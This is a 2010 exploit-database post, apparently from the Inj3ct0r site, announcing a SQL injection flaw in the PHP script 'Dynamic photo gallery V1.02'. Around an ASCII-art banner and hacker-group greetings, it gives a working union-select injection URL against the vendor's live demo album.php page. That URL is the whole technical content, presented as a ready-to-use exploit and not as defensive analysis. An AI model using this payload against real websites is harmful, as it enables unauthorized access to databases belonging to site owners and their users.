Dynamic photo gallery V1.02 SQL Injection Vulnerability
Posted on 08 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Dynamic photo gallery V1.02 SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= Dynamic photo gallery V1.02 SQL Injection Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ################################### 1 0 I'm SONiC member from Inj3ct0r Team 1 1 ################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Dynamic photo gallery V1.02-- SQL iNj3cti0N? Vulnerability Date : july 8,2010 Critical Level :VERY HIGH vendor URL :?? http://www.phpwebscript.net ####################################################################################################### Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com> Special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x Greetz to :www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com Special Shoutz : H***** [my Girl Frnd] [Elite .NET Programmer] ####################################################################################################### Description: EPIG displays an image gallery with automatically generated thumbnails for all the image files (supports JPEG, GIF and PNG files) on the current folder. You can then click on the thumbnails to see the actual images and you can navigate page-by-page or by page numbers. ####################################################################################################### Xploit :SQl iNj3cTi0N Vulnerabilty DEMO URL? http://www.phpwebscript.net/dynamicphotogallery/demo/album.php?albumID=-9%20union%20all%20select%207,6,5,4,3,2,1-- ############################################################################################################### # ..::[ SONiC ]::.. aka the_pshyco # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
